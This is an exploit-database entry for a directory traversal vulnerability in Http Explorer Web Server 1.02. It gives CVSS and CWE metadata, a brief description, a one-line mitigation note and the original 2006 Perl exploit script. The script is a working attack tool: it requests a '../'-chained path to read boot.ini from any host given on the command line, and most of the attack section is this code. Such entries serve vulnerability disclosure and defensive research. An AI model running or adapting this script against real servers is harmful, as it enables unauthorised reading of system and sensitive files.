header-logo
Suggest Exploit
vendor:
Http Explorer Web Server
by:
str0ke
7,5
CVSS
HIGH
Directory Transversal
22
CWE
Product Name: Http Explorer Web Server
Affected Version From: 1.02
Affected Version To: 1.02
Patch Exists: NO
Related CWE: N/A
CPE: a:http_explorer:http_explorer_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Http explorer Web Server 1.02 Directory Transversal Vulnerability

This vulnerability allows an attacker to access files outside of the web root directory. This is done by using the '../' directory traversal technique. An attacker can use this vulnerability to access sensitive files such as boot.ini.

Mitigation:

Ensure that web applications are not vulnerable to directory traversal attacks by validating user input and sanitizing user input.
Source

Exploit-DB raw data:

# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test:  http://[site]/../../../../ || http://[site]/../
# /str0ke

use LWP::Simple;
use strict;

sub usage
{
    print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
    print "str0ke (milw0rm.com)\n";
    print "Usage: $0 www.example.com\n";
    exit ();
}

my $host= shift || &usage;

getprint "http://" . $host . "/../../../../../../../../boot.ini";

# milw0rm.com [2006-12-21]

Navigation

Suggest Exploit

Services By CQR